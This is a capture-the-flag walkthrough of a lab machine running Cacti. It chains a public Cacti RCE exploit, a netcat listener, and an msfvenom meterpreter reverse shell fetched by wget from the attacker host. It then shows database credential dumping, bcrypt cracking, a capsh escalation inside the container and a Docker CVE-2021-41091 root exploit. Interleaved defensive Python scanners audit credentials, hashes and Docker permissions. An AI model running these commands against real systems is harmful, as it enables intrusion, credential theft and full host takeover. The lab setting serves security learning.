Service overview

Let's see which services are exposed by the machine (10.10.11.211):

$ autorecon 10.10.11.211  
[*] Scanning target 10.10.11.211  
[!] [10.10.11.211/top-100-udp-ports] UDP scan requires AutoRecon be run with root privileges.  
[*] [10.10.11.211/all-tcp-ports] Discovered open port tcp/80 on 10.10.11.211  
[*] [10.10.11.211/all-tcp-ports] Discovered open port tcp/22 on 10.10.11.211  
[*] [10.10.11.211/tcp/80/http/vhost-enum] The target was not a hostname, nor was a hostname provided as an option. Skipping virtual host enumeration.  
[*] [10.10.11.211/tcp/80/http/known-security] [tcp/80/http/known-security] There did not appear to be a .well-known/security.txt file in the webroot (/).  
[*] [10.10.11.211/tcp/80/http/curl-robots] [tcp/80/http/curl-robots] There did not appear to be a robots.txt file in the webroot (/).

Port 80 serves Cacti.

Cacti


Version 1.2.22 is vulnerable and has a public exploit:

$ git clone https://github.com/FredBrave/CVE-2022-46169-CACTI-1.2.22
$ cd CVE-2022-46169-CACTI-1.2.22
$ nc -lnvp 443
$ python3 CVE-2022-46169.py --url=http://10.10.11.211 --LHOST=10.10.14.175 --LPORT=443
Checking…  
The target is vulnerable. Exploiting…  
Bruteforcing the host_id and local_data_ids  
Bruteforce Success!!


Let's upgrade to a meterpreter session:

# generate the payload

$ msfvenom -p linux/x64/meterpreter/reverse_tcp LHOST=10.10.14.175 LPORT=80 -f elf -o shell  
[-] No platform was selected, choosing Msf::Module::Platform::Linux from the payload  
[-] No arch selected, selecting arch: x64 from the payload  
No encoder specified, outputting raw payload  
Payload size: 130 bytes  
Final size of elf file: 250 bytes  
Saved as: shell

# listener

$ msfconsole

# file server

$ python3 -m http.server 444
Serving HTTP on 0.0.0.0 port 444 (http://0.0.0.0:444/) ...
10.10.11.211 - - [23/Jun/2023 06:08:34] "GET /shell HTTP/1.1" 200 -  
^C  
Keyboard interrupt received, exiting.

# on the target machine

www-data@50bca5e748b0:/$ cd tmp
www-data@50bca5e748b0:/tmp$ wget http://10.10.14.175:444/shell
--2023-06-23 10:08:36-- http://10.10.14.175:444/shell
Connecting to 10.10.14.175:444… connected.  
HTTP request sent, awaiting response… 200 OK  
Length: 250 [application/octet-stream]  
Saving to: 'shell'

     0K                                                       100% 53.0M=0s

2023-06-23 10:08:36 (53.0 MB/s) - 'shell' saved [250/250]

www-data@50bca5e748b0:/tmp$ chmod +x shell  
www-data@50bca5e748b0:/tmp$ ./shell


Database

Secrets and connection endpoint

Let's find the database credentials:

$ cd /  
$ cat entrypoint.sh  
#!/bin/bash  
set -ex

wait-for-it db:3306 -t 300 -- echo "database is connected"  
if [[ ! $(mysql --host=db --user=root --password=root cacti -e "show tables") =~ "automation_devices" ]]; then  
 mysql --host=db --user=root --password=root cacti < /var/www/html/cacti.sql  
 mysql --host=db --user=root --password=root cacti -e "UPDATE user_auth SET must_change_password='' WHERE username = 'admin'"  
 mysql --host=db --user=root --password=root cacti -e "SET GLOBAL time_zone = 'UTC'"  
fi

chown www-data:www-data -R /var/www/html

# first arg is `-f` or `--some-option`

if [ "${1#-}" != "$1" ]; then  
  set -- apache2-foreground "$@"  
fi

exec "$@"

The credentials are root:root and the endpoint is the host db (we are inside a docker container, so db resolves on the container network).
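As an added example (not part of the original writeup), a small Python scanner for the kind of inline database credentials this entrypoint contains, together with the rewrite a defender would apply: move the user/password pair into a mysql defaults file (mounted as a Docker secret or a 0600 file) and reference it with --defaults-extra-file. The entrypoint text is embedded as a constructed sample copied from the listing above; the secret path /run/secrets/cacti-db.cnf and all function names are assumptions of this example.

```python
import re

# Constructed sample: the container's entrypoint.sh as shown in the writeup,
# embedded so the scanner runs offline.
SAMPLE_ENTRYPOINT = """#!/bin/bash
set -ex

wait-for-it db:3306 -t 300 -- echo "database is connected"
if [[ ! $(mysql --host=db --user=root --password=root cacti -e "show tables") =~ "automation_devices" ]]; then
 mysql --host=db --user=root --password=root cacti < /var/www/html/cacti.sql
 mysql --host=db --user=root --password=root cacti -e "UPDATE user_auth SET must_change_password='' WHERE username = 'admin'"
 mysql --host=db --user=root --password=root cacti -e "SET GLOBAL time_zone = 'UTC'"
fi

chown www-data:www-data -R /var/www/html
exec "$@"
"""

# Each pattern captures the secret itself in group 1.
PATTERNS = [
    ("mysql --password=", re.compile(r"\bmysql\b[^\n]*?--password=(\S+)")),
    ("MYSQL_PWD env var", re.compile(r"\bMYSQL_PWD=(\S+)")),
    ("shell PASSWORD= assignment", re.compile(r"\b[A-Z_]*PASSWORD=['\"]?([^'\"\s]+)")),
]


def find_hardcoded_credentials(text):
    """Return (line_number, kind, secret) for every inline secret in a shell script."""
    findings = []
    for lineno, line in enumerate(text.splitlines(), start=1):
        for kind, pattern in PATTERNS:
            for m in pattern.finditer(line):
                findings.append((lineno, kind, m.group(1)))
    return findings


# Assumed location of the secret file inside the container (e.g. a Docker
# secret injected at deploy time); not from the writeup.
DEFAULTS_FILE = "/run/secrets/cacti-db.cnf"

INLINE_AUTH_RE = re.compile(r"--user=(\S+)\s+--password=(\S+)")


def rewrite_with_defaults_file(text, defaults_file=DEFAULTS_FILE):
    """Replace inline --user/--password pairs with --defaults-extra-file=<path>.
    Returns (rewritten_script, credentials_seen); credentials_seen is the set of
    (user, password) pairs that must be provisioned into the defaults file."""
    seen = set()

    def repl(m):
        seen.add((m.group(1), m.group(2)))
        return f"--defaults-extra-file={defaults_file}"

    return INLINE_AUTH_RE.sub(repl, text), seen


def defaults_file_contents(user, password):
    """Body of the my.cnf-style file mysql reads via --defaults-extra-file."""
    return f"[client]\nuser={user}\npassword={password}\n"


if __name__ == "__main__":
    for lineno, kind, secret in find_hardcoded_credentials(SAMPLE_ENTRYPOINT):
        print(f"line {lineno}: {kind} -> {secret!r}")
    fixed, creds = rewrite_with_defaults_file(SAMPLE_ENTRYPOINT)
    print(fixed)
    for user, password in creds:
        print(defaults_file_contents(user, password))
```

The scanner reports the four mysql invocations (script lines 5 to 8) with the secret root; after the rewrite the script carries no password at all, and the defaults file is the single place to protect with file permissions and rotate. The rewrite keeps --host=db on the command line, which mysql honours over anything in the defaults file.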

Database overview

List the available databases:

$ mysql -u root -p -h db -e "show databases;"  
Enter password: root  
Database  
information_schema  
cacti  
mysql  
performance_schema  
sys

List all tables:

$ mysql -u root -p -h db cacti -e "show tables;"  
Enter password: root  
Tables_in_cacti  
aggregate_graph_templates  
aggregate_graph_templates_graph  
aggregate_graph_templates_item  
aggregate_graphs  
aggregate_graphs_graph_item  
aggregate_graphs_items  
automation_devices  
automation_graph_rule_items  
automation_graph_rules  
automation_ips  
automation_match_rule_items  
automation_networks  
automation_processes  
automation_snmp  
automation_snmp_items  
automation_templates  
automation_tree_rule_items  
automation_tree_rules  
cdef  
cdef_items  
color_template_items  
color_templates  
colors  
data_debug  
data_input  
data_input_data  
data_input_fields  
data_local  
data_source_profiles  
data_source_profiles_cf  
data_source_profiles_rra  
data_source_purge_action  
data_source_purge_temp  
data_source_stats_daily  
data_source_stats_hourly  
data_source_stats_hourly_cache  
data_source_stats_hourly_last  
data_source_stats_monthly  
data_source_stats_weekly  
data_source_stats_yearly  
data_template  
data_template_data  
data_template_rrd  
external_links  
graph_local  
graph_template_input  
graph_template_input_defs  
graph_templates  
graph_templates_gprint  
graph_templates_graph  
graph_templates_item  
graph_tree  
graph_tree_items  
host  
host_graph  
host_snmp_cache  
host_snmp_query  
host_template  
host_template_graph  
host_template_snmp_query  
plugin_config  
plugin_db_changes  
plugin_hooks  
plugin_realms  
poller  
poller_command  
poller_data_template_field_mappings  
poller_item  
poller_output  
poller_output_boost  
poller_output_boost_local_data_ids  
poller_output_boost_processes  
poller_output_realtime  
poller_reindex  
poller_resource_cache  
poller_time  
processes  
reports  
reports_items  
sessions  
settings  
settings_tree  
settings_user  
settings_user_group  
sites  
snmp_query  
snmp_query_graph  
snmp_query_graph_rrd  
snmp_query_graph_rrd_sv  
snmp_query_graph_sv  
snmpagent_cache  
snmpagent_cache_notifications  
snmpagent_cache_textual_conventions  
snmpagent_managers  
snmpagent_managers_notifications  
snmpagent_mibs  
snmpagent_notifications_log  
user_auth  
user_auth_cache  
user_auth_group  
user_auth_group_members  
user_auth_group_perms  
user_auth_group_realm  
user_auth_perms  
user_auth_realm  
user_domains  
user_domains_ldap  
user_log  
vdef  
vdef_items  
version

Dump the hashes from the user_auth table:

$ mysql -u root -p -h db cacti -e "select * from user_auth;"  
Enter password: root  
id      username        password        realm   full_name       email_address   must_change_password    password_change show_tree        show_list       show_preview    graph_settings  login_opts      policy_graphs   policy_trees    policy_hosts    policy_graph_templates  enabled lastchange      lastlogin       password_history        locked  failed_attempts lastfail reset_perms
1       admin   $2y$10$IhEA.Og8vrvwueM7VEDkUes3pwc3zaBbQ/iuqMft/llx8utpR1hjC 0 Jamie Thompson [email protected] on on on on on 2 1 1 1 1 on -1 -1 -1 0 0 663348655  
3 guest 43e9a4ab75570f5b 0 Guest Account on on on on on 3 -1 -1 -1 0 0 0  
4 marcus $2y$10$vcrYth5YcCLlZaPDj6PwqOYTw68W1.3WeKlBn70JonsdW/MhFYK4C 0 Marcus Brune [email protected] on on on on 1 1 1 1 1 on -1 -1 on 0 0 2135691668

Identify the hash type and try a dictionary attack against it:

$ hashid  
$2y$10$vcrYth5YcCLlZaPDj6PwqOYTw68W1.3WeKlBn70JonsdW/MhFYK4C  
Analyzing '$2y$10$vcrYth5YcCLlZaPDj6PwqOYTw68W1.3WeKlBn70JonsdW/MhFYK4C'  
[+] Blowfish(OpenBSD)  
[+] Woltlab Burning Board 4.x  
[+] bcrypt  
$ john hashes.txt --wordlist=/usr/share/wordlists/rockyou.txt --format=bcrypt  
Using default input encoding: UTF-8  
Loaded 2 password hashes with 2 different salts (bcrypt [Blowfish 32/64 X3])  
Cost 1 (iteration count) is 1024 for all loaded hashes  
Will run 8 OpenMP threads  
Press 'q' or Ctrl-C to abort, almost any other key for status  
funkymonkey (?)

The recovered password is funkymonkey.
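As an added example (my own code, not from the writeup), a parser for the password formats seen in user_auth: it decodes the bcrypt modular-crypt string (variant, cost, salt), derives the iteration count that john reports as "Cost 1 (iteration count) is 1024" for cost 10, and flags accounts whose stored hash is a legacy non-bcrypt format or a bcrypt cost below a chosen minimum. The three rows are copied from the dump above; the function names and the 16-hex "legacy" label are this example's own.

```python
import re

# bcrypt modular-crypt format: $2y$<cost>$<22-char salt><31-char digest>
BCRYPT_RE = re.compile(
    r"^\$(2[abxy]?)\$(\d{2})\$([./A-Za-z0-9]{22})([./A-Za-z0-9]{31})$"
)


def classify_cacti_hash(h):
    """Describe a user_auth.password value: scheme, work factor and whether it
    is a legacy format that should be migrated to bcrypt."""
    m = BCRYPT_RE.match(h)
    if m:
        cost = int(m.group(2))
        return {"scheme": "bcrypt", "variant": m.group(1), "cost": cost,
                "iterations": 2 ** cost, "salt": m.group(3), "legacy": False}
    if re.fullmatch(r"[0-9a-f]{16}", h):
        # 16 hex characters, no salt and no work factor: the pre-bcrypt format
        # still carried by the stock guest account in the dump above.
        return {"scheme": "legacy-16hex", "variant": None, "cost": None,
                "iterations": None, "salt": None, "legacy": True}
    if re.fullmatch(r"[0-9a-f]{32}", h):
        return {"scheme": "unsalted-md5", "variant": None, "cost": None,
                "iterations": None, "salt": None, "legacy": True}
    return {"scheme": "unknown", "variant": None, "cost": None,
            "iterations": None, "salt": None, "legacy": True}


# (id, username, password) taken from the user_auth rows above.
USER_AUTH_ROWS = [
    (1, "admin", "$2y$10$IhEA.Og8vrvwueM7VEDkUes3pwc3zaBbQ/iuqMft/llx8utpR1hjC"),
    (3, "guest", "43e9a4ab75570f5b"),
    (4, "marcus", "$2y$10$vcrYth5YcCLlZaPDj6PwqOYTw68W1.3WeKlBn70JonsdW/MhFYK4C"),
]


def audit_user_auth(rows, min_cost=10):
    """Return (username, reason) for accounts whose stored hash is weak:
    a legacy format, or bcrypt with a cost below min_cost."""
    weak = []
    for _, username, h in rows:
        info = classify_cacti_hash(h)
        if info["legacy"]:
            weak.append((username, f"{info['scheme']}: not bcrypt, migrate or disable"))
        elif info["cost"] < min_cost:
            weak.append((username, f"bcrypt cost {info['cost']} below {min_cost}"))
    return weak


if __name__ == "__main__":
    for _, user, h in USER_AUTH_ROWS:
        info = classify_cacti_hash(h)
        print(f"{user:7} {info['scheme']:13} cost={info['cost']} iterations={info['iterations']}")
    print(audit_user_auth(USER_AUTH_ROWS))
```

For marcus the parser returns cost 10, 1024 iterations and the salt vcrYth5YcCLlZaPDj6PwqO; the only account flagged is guest, whose 16-hex value is not bcrypt at all. The cost is what makes the dictionary attack above slow per guess, so a weak password still falls to rockyou regardless of the work factor; the audit only tells you which hashes are not even getting that protection.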

SSH

Use the recovered password to connect over SSH:

$ ssh marcus@10.10.11.211
funkymonkey


User flag

marcus@monitorstwo:~$ id  
uid=1000(marcus) gid=1000(marcus) groups=1000(marcus)  
marcus@monitorstwo:~$ cat user.txt  
e0a8dd2d31adad1fb1265dd72450995b  
marcus@monitorstwo:~$ ip a  
1: lo: <LOOPBACK,UP,LOWER_UP> mtu 65536 qdisc noqueue state UNKNOWN group default qlen 1000  
 link/loopback 00:00:00:00:00:00 brd 00:00:00:00:00:00  
 inet 127.0.0.1/8 scope host lo  
    valid_lft forever preferred_lft forever  
 inet6 ::1/128 scope host  
    valid_lft forever preferred_lft forever  
2: eth0: <BROADCAST,MULTICAST,UP,LOWER_UP> mtu 1500 qdisc mq state UP group default qlen 1000  
 link/ether 00:50:56:b9:7c:e0 brd ff:ff:ff:ff:ff:ff  
 inet 10.10.11.211/23 brd 10.10.11.255 scope global eth0  
    valid_lft forever preferred_lft forever  
 inet6 dead:beef::250:56ff:feb9:7ce0/64 scope global dynamic mngtmpaddr  
    valid_lft 86398sec preferred_lft 14398sec  
 inet6 fe80::250:56ff:feb9:7ce0/64 scope link  
    valid_lft forever preferred_lft forever  
3: docker0: <NO-CARRIER,BROADCAST,MULTICAST,UP> mtu 1500 qdisc noqueue state DOWN group default  
 link/ether 02:42:cc:41:77:20 brd ff:ff:ff:ff:ff:ff  
 inet 172.17.0.1/16 brd 172.17.255.255 scope global docker0  
    valid_lft forever preferred_lft forever  
4: br-60ea49c21773: <NO-CARRIER,BROADCAST,MULTICAST,UP> mtu 1500 qdisc noqueue state DOWN group default  
 link/ether 02:42:97:eb:7b:89 brd ff:ff:ff:ff:ff:ff  
 inet 172.18.0.1/16 brd 172.18.255.255 scope global br-60ea49c21773  
    valid_lft forever preferred_lft forever  
5: br-7c3b7c0d00b3: <BROADCAST,MULTICAST,UP,LOWER_UP> mtu 1500 qdisc noqueue state UP group default  
 link/ether 02:42:30:9c:57:ce brd ff:ff:ff:ff:ff:ff  
 inet 172.19.0.1/16 brd 172.19.255.255 scope global br-7c3b7c0d00b3  
    valid_lft forever preferred_lft forever  
 inet6 fe80::42:30ff:fe9c:57ce/64 scope link  
    valid_lft forever preferred_lft forever  
7: vethfe25ed3@if6: <BROADCAST,MULTICAST,UP,LOWER_UP> mtu 1500 qdisc noqueue master br-7c3b7c0d00b3 state UP group default  
 link/ether 36:d4:63:7a:07:00 brd ff:ff:ff:ff:ff:ff link-netnsid 0  
 inet6 fe80::34d4:63ff:fe7a:700/64 scope link  
    valid_lft forever preferred_lft forever  
9: vethb65e5d8@if8: <BROADCAST,MULTICAST,UP,LOWER_UP> mtu 1500 qdisc noqueue master br-7c3b7c0d00b3 state UP group default  
 link/ether 2e:53:2f:fe:53:5a brd ff:ff:ff:ff:ff:ff link-netnsid 1  
 inet6 fe80::2c53:2fff:fefe:535a/64 scope link  
    valid_lft forever preferred_lft forever


Mail

On SSH login there is a notice about new mail for the user marcus; let's read it:

marcus@monitorstwo:~$ cat /var/mail/marcus  
From: [email protected]  
To: [email protected]  
Subject: Security Bulletin - Three Vulnerabilities to be Aware Of

Dear all,

We would like to bring to your attention three vulnerabilities that have been recently discovered and should be addressed as soon as possible.

CVE-2021-33033: This vulnerability affects the Linux kernel before 5.11.14 and is related to the CIPSO and CALIPSO refcounting for the DOI definitions. Attackers can exploit this use-after-free issue to write arbitrary values. Please update your kernel to version 5.11.14 or later to address this vulnerability.

CVE-2020-25706: This cross-site scripting (XSS) vulnerability affects Cacti 1.2.13 and occurs due to improper escaping of error messages during template import previews in the xml_path field. This could allow an attacker to inject malicious code into the webpage, potentially resulting in the theft of sensitive data or session hijacking. Please upgrade to Cacti version 1.2.14 or later to address this vulnerability.

CVE-2021-41091: This vulnerability affects Moby, an open-source project created by Docker for software containerization. Attackers could exploit this vulnerability by traversing directory contents and executing programs on the data directory with insufficiently restricted permissions. The bug has been fixed in Moby (Docker Engine) version 20.10.9, and users should update to this version as soon as possible. Please note that running containers should be stopped and restarted for the permissions to be fixed.

We encourage you to take the necessary steps to address these vulnerabilities promptly to avoid any potential security breaches. If you have any questions or concerns, please do not hesitate to contact our IT department.

Best regards,

Administrator  
CISO  
Monitor Two  
Security Team

A message from the CISO stating that vulnerabilities have been found in the system.

Privilege escalation

Let's try CVE-2021-41091. First check which Docker version is installed:

marcus@monitorstwo:~$ docker --version  
Docker version 20.10.5+dfsg1, build 55c4c88

The version is affected (older than the fixed 20.10.9).

To use the ready-made exploit we need root inside the docker container, so let's search the container (the initial meterpreter shell) for binaries with the suid bit:

$ find / -perm /4000  
/usr/bin/gpasswd  
/usr/bin/passwd  
/usr/bin/chsh  
/sbin/capsh  
/bin/mount  
/bin/umount  
/bin/su

The unusual /sbin/capsh binary is of interest; let's check GTFOBins:

/sbin/capsh --gid=0 --uid=0 --


As root inside the container, set the suid bit on /bin/bash:

chmod u+s /bin/bash

Now we can use CVE-2021-41091:

$ wget https://raw.githubusercontent.com/UncleJ4ck/CVE-2021-41091/main/exp.sh

# upload the file to the target machine and run it

marcus@monitorstwo:/tmp$ bash exp.sh  
[!] Vulnerable to CVE-2021-41091  
[!] Now connect to your Docker container that is accessible and obtain root access !  
[>] After gaining root access execute this command (chmod u+s /bin/bash)

Did you correctly set the setuid bit on /bin/bash in the Docker container? (yes/no): yes  
[!] Available Overlay2 Filesystems:  
/var/lib/docker/overlay2/4ec09ecfa6f3a290dc6b247d7f4ff71a398d4f17060cdaf065e8bb83007effec/merged  
/var/lib/docker/overlay2/c41d5854e43bd996e128d647cb526b73d04c9ad6325201c85f73fdba372cb2f1/merged

[!] Iterating over the available Overlay2 filesystems !  
[?] Checking path: /var/lib/docker/overlay2/4ec09ecfa6f3a290dc6b247d7f4ff71a398d4f17060cdaf065e8bb83007effec/merged  
[x] Could not get root access in '/var/lib/docker/overlay2/4ec09ecfa6f3a290dc6b247d7f4ff71a398d4f17060cdaf065e8bb83007effec/merged'

[?] Checking path: /var/lib/docker/overlay2/c41d5854e43bd996e128d647cb526b73d04c9ad6325201c85f73fdba372cb2f1/merged  
[!] Rooted !  
[>] Current Vulnerable Path: /var/lib/docker/overlay2/c41d5854e43bd996e128d647cb526b73d04c9ad6325201c85f73fdba372cb2f1/merged  
[?] If it didn't spawn a shell go to this path and execute './bin/bash -p'

[!] Spawning Shell  
bash-5.1# exit  
marcus@monitorstwo:/tmp$ ./bin/bash -p  
-bash: ./bin/bash: No such file or directory  
marcus@monitorstwo:/tmp$ /var/lib/docker/overlay2/c41d5854e43bd996e128d647cb526b73d04c9ad6325201c85f73fdba372cb2f1/merged/bin/bash -p  
bash-5.1# id  
uid=1000(marcus) gid=1000(marcus) euid=0(root) groups=1000(marcus)
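As an added example, not part of the writeup or of the exploit script it uses, here is the check a defender would run on the host for both steps above: the version string from docker --version is compared against the fix release named in the security bulletin, and the Docker data directory is audited for the two conditions the escalation depends on, a world-searchable directory chain down to an overlay2 merged layer and setuid binaries inside that layer, with the remediation (strip "other" permissions from the data root and overlay2 home, which patched releases create as 0710) applied and re-checked. The directory tree is constructed in a temporary folder; only the layer id is copied from the output above, and every function name is this example's own.

```python
import os
import re
import stat
import tempfile

# Docker Engine release that restricted the data-directory permissions
# (taken from the security bulletin quoted above).
FIXED_IN = (20, 10, 9)


def parse_docker_version(text):
    """Extract (major, minor, patch) from 'docker --version' output or a bare
    version string; distro suffixes such as '+dfsg1' are ignored."""
    m = re.search(r"(\d+)\.(\d+)\.(\d+)", text)
    if not m:
        raise ValueError(f"no version number in {text!r}")
    return tuple(int(x) for x in m.groups())


def version_affected_by_cve_2021_41091(text):
    """True when the upstream version predates the fix. Distributions may
    backport the fix without bumping the version, so treat this as a hint and
    let the permission audit decide."""
    return parse_docker_version(text) < FIXED_IN


def traversable_by_others(root, target):
    """True if every directory from root down to target's parent grants the
    search (execute) bit to 'others', i.e. an unprivileged host user can reach
    target by path even without being able to list the directories."""
    rel = os.path.relpath(os.path.dirname(target), root)
    parts = [] if rel == "." else rel.split(os.sep)
    path = root
    for part in [None] + parts:
        if part is not None:
            path = os.path.join(path, part)
        if not (os.lstat(path).st_mode & stat.S_IXOTH):
            return False
    return True


def audit_docker_root(root):
    """Walk a Docker data directory and return (path, finding) tuples for
    world-searchable directories and for setuid/setgid regular files."""
    findings = []
    for dirpath, _, filenames in os.walk(root):
        if os.lstat(dirpath).st_mode & stat.S_IXOTH:
            findings.append((dirpath, "world-searchable directory"))
        for name in filenames:
            p = os.path.join(dirpath, name)
            st = os.lstat(p)
            if stat.S_ISREG(st.st_mode) and st.st_mode & (stat.S_ISUID | stat.S_ISGID):
                findings.append((p, "setuid/setgid file"))
    return findings


def harden_docker_root(root):
    """Remediation: strip all 'other' permissions from the data directory and
    its overlay2 home (0710, as patched releases create them). Setuid files
    inside layers are left alone; they simply become unreachable from outside."""
    for d in (root, os.path.join(root, "overlay2")):
        if os.path.isdir(d):
            os.chmod(d, 0o710)


# Layer id taken from the exploit output above; the tree itself is constructed.
DEMO_LAYER_ID = "c41d5854e43bd996e128d647cb526b73d04c9ad6325201c85f73fdba372cb2f1"


def demo_setuid_path(root):
    return os.path.join(root, "overlay2", DEMO_LAYER_ID, "merged", "bin", "bash")


def build_demo_tree():
    """Construct a stand-in for /var/lib/docker with pre-fix (0755) directory
    modes and a setuid 'bash' placeholder inside the merged layer."""
    root = tempfile.mkdtemp(prefix="docker-demo-")
    bash = demo_setuid_path(root)
    os.makedirs(os.path.dirname(bash))
    with open(bash, "w") as f:
        f.write("#!/bin/sh\n")  # placeholder content, never executed
    os.chmod(bash, 0o4755)
    d = os.path.dirname(bash)
    while True:  # world-searchable all the way up to the data root
        os.chmod(d, 0o755)
        if d == root:
            break
        d = os.path.dirname(d)
    return root


if __name__ == "__main__":
    print("version affected:", version_affected_by_cve_2021_41091(
        "Docker version 20.10.5+dfsg1, build 55c4c88"))
    root = build_demo_tree()
    bash = demo_setuid_path(root)
    print("before:", traversable_by_others(root, bash), audit_docker_root(root))
    harden_docker_root(root)
    print("after:", traversable_by_others(root, bash), audit_docker_root(root))
```

Before hardening the audit lists the whole directory chain as world-searchable and the merged layer's bash as setuid, which is exactly the pair the exploit output above relies on; after chmod 0710 on the data root the same file is still setuid but no longer reachable by an unprivileged host user. The version check alone is not conclusive on distribution packages, which is why the permission audit is the check to trust.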

Root flag

bash-5.1# id  
uid=1000(marcus) gid=1000(marcus) euid=0(root) groups=1000(marcus)  
bash-5.1# ip a  
1: lo: <LOOPBACK,UP,LOWER_UP> mtu 65536 qdisc noqueue state UNKNOWN group default qlen 1000  
 link/loopback 00:00:00:00:00:00 brd 00:00:00:00:00:00  
 inet 127.0.0.1/8 scope host lo  
    valid_lft forever preferred_lft forever  
 inet6 ::1/128 scope host  
    valid_lft forever preferred_lft forever  
2: eth0: <BROADCAST,MULTICAST,UP,LOWER_UP> mtu 1500 qdisc mq state UP group default qlen 1000  
 link/ether 00:50:56:b9:7c:e0 brd ff:ff:ff:ff:ff:ff  
 inet 10.10.11.211/23 brd 10.10.11.255 scope global eth0  
    valid_lft forever preferred_lft forever  
 inet6 dead:beef::250:56ff:feb9:7ce0/64 scope global dynamic mngtmpaddr  
    valid_lft 86399sec preferred_lft 14399sec  
 inet6 fe80::250:56ff:feb9:7ce0/64 scope link  
    valid_lft forever preferred_lft forever  
3: docker0: <NO-CARRIER,BROADCAST,MULTICAST,UP> mtu 1500 qdisc noqueue state DOWN group default  
 link/ether 02:42:cc:41:77:20 brd ff:ff:ff:ff:ff:ff  
 inet 172.17.0.1/16 brd 172.17.255.255 scope global docker0  
    valid_lft forever preferred_lft forever  
4: br-60ea49c21773: <NO-CARRIER,BROADCAST,MULTICAST,UP> mtu 1500 qdisc noqueue state DOWN group default  
 link/ether 02:42:97:eb:7b:89 brd ff:ff:ff:ff:ff:ff  
 inet 172.18.0.1/16 brd 172.18.255.255 scope global br-60ea49c21773  
    valid_lft forever preferred_lft forever  
5: br-7c3b7c0d00b3: <BROADCAST,MULTICAST,UP,LOWER_UP> mtu 1500 qdisc noqueue state UP group default  
 link/ether 02:42:30:9c:57:ce brd ff:ff:ff:ff:ff:ff  
 inet 172.19.0.1/16 brd 172.19.255.255 scope global br-7c3b7c0d00b3  
    valid_lft forever preferred_lft forever  
 inet6 fe80::42:30ff:fe9c:57ce/64 scope link  
    valid_lft forever preferred_lft forever  
7: vethfe25ed3@if6: <BROADCAST,MULTICAST,UP,LOWER_UP> mtu 1500 qdisc noqueue master br-7c3b7c0d00b3 state UP group default  
 link/ether 36:d4:63:7a:07:00 brd ff:ff:ff:ff:ff:ff link-netnsid 0  
 inet6 fe80::34d4:63ff:fe7a:700/64 scope link  
    valid_lft forever preferred_lft forever  
9: vethb65e5d8@if8: <BROADCAST,MULTICAST,UP,LOWER_UP> mtu 1500 qdisc noqueue master br-7c3b7c0d00b3 state UP group default  
 link/ether 2e:53:2f:fe:53:5a brd ff:ff:ff:ff:ff:ff link-netnsid 1  
 inet6 fe80::2c53:2fff:fefe:535a/64 scope link  
    valid_lft forever preferred_lft forever  
bash-5.1# cat root.txt  
4d12b504a9082ab093bdca77f0077453
